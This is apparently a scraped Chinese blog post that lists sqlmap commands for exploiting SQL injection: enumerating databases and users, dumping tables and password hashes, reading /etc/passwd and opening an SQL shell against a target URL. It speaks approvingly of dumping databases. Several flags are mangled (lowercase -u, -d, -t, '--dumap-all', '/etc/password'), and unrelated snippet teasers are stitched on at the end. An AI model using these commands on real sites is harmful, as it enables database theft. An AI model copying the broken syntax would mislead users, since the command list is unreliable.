SqlMap之資料庫操作語句總結

2021-09-06 14:39:06 字數 3220 閱讀 3470

sqlmap是一款開源的滲透測試程式,它可以自動探測和利用sql注入漏洞來獲得我們想要的資料。我們可以利用它執行特定的命令、檢視檔案、獲取各種資料;當然,最猥瑣的是它利用注入點拖庫的速率還是灰常讓人滿意的。

#>  ./sqlmap.py -u 「注入位址」 -v 1 --dbs   // 列舉資料庫 

#> ./sqlmap.py -u 「注入位址」 -v 1 --current-db   // 當前資料庫

#>./sqlmap.py -u 「注入位址」 -v 1 --users    // 列資料庫使用者

#>  ./sqlmap.py -u 「注入位址」 -v 1 --current-user  // 當前使用者

#>  ./sqlmap.py -u 「注入位址」 -v 1 --tables -d 「資料庫」   // 列舉資料庫的表名

#> ./sqlmap.py -u 「注入位址」 -v 1 --columns -t 「表名」 -d 「資料庫」   // 獲取表的列名

#>./sqlmap.py -u 「注入位址」 -v 1 --dump -c 「字段,字段」 -t 「表名」 -d 「資料庫」   // 獲取表中的資料,包含列 

已經開始拖庫了,sqlmap是非常人性化的,它會將獲取的資料儲存sqlmap/output/中、

mysql資料庫舉例:

1) 判斷當前使用者是否是dba

python sqlmap.py -u "url" --is-dba -v 1

2) --users:列出資料庫管理系統使用者

python sqlmap.py -u "url" --users -v 0

3) --passwords:資料庫使用者密碼(hash)

python sqlmap.py -u "url" --passwords -v 0

python sqlmap.py -u "url" --passwords -u sa -v 0

4) 檢視使用者許可權

python sqlmap.py -u "url" --privileges -v 0

python sqlmap.py -u "url" --privileges -u postgres -v 0

5) --dbs可以利用的資料庫

python sqlmap.py -u "url" --dbs -v 0

6) --tables列資料庫表

python sqlmap.py -u "url" --tables -d "information_scheam"

-d:指定資料名稱

7) --columns 列出表中的列名

python sqlmap.py -u "url" --columns -t "user" -d "mysql" -v 1

-t:指定表名,-d:指定庫名

8) --dump列表中指定列的內容

python sqlmap.py -u "url" --dump -t "users" -d "testdb"

-c:可以指定字段

指定列的範圍為2到4

python sqlmap.py -u "url" --dump -t "users" -d "testdb"  --start 2 --stop 4 -v 0

9) --dumap-all列出所有資料庫,所有表內容

python sqlmap.py -u "url" --dump-all -v 0

只列出使用者自己新建的資料庫和表的內容

python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0

10) --file讀取檔案內容[load_file()函式]

python sqlmap.py -u "url" --file /etc/password

11) 執行sql

python sqlmap.py -u "url" --sql-shell

12) -p 指定引數

python sqlmap.py -u "url" -v 1 -p "id"

-p可以指定多引數-p "cat,id"

13) post提交

python sqlmap.py -u "url" --method post --data "id=1"

14) cookie提交

python sqlmap.py -u "url" --cookie "id=1" -v 1

cookie值可以由tamperdata抓取

15) refer欺騙

python sqlmap.py -u "url" --refer "url" -v 3

16) 使用自定義user-agent或者user-agents.txt

python sqlmap.py -u "url" --user-agent "mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)" -v 3

python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"

17) 使用多執行緒猜解

python sqlmap.py -u "url" -v 1 --current-user --threads 3

18) 指定資料庫,繞過sqlmap的自動檢測

python sqlmap.py -u "url" -v 2 --dbms "postgresql"

19) 指定作業系統繞過sqlmap自動檢測

python sqlmap.py -u "url" -v 2 --os "windows"

20) --prefix and --postfix自定義payload

python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"

21) union注入測試

python sqlmap.py -u "url" --union-test -v -1

22) 配合order by

python sqlmap.py -u "url" --union-test --union-tech orderby -v 1

23) python sqlmap.py -u "url" -v 1 --union-use --banner

24) python sqlmap.py -u "url" -v 5 --union-use --current-user

25) python sqlmap.py -u "url" -v 1 --union-use --dbs

資料庫操作語句

mysql分頁limit用法 limit後的第乙個引數是輸出記錄的初始位置,第二個引數偏移量。如 select from tables limit 10,3 返回的就是11到13,3條資料。如果只給定乙個引數,它表示返回最大的記錄行數目 select from table limit 5 檢索前 5...

資料庫操作語句

1 檢視當前資料庫版本資訊 select from product component version select from v version 2 授權與取消 grant 許可權 如sysdba to 使用者名稱 revoke 許可權 如sysdba from 使用者名稱 3 檢視資料庫中哪些使...

資料庫操作語句

1 建立資料庫 命令 create database 資料庫名 例如 建立乙個名為test的資料庫 drop database life if exists test create database life character set utf8 use life set names gbk 2 顯...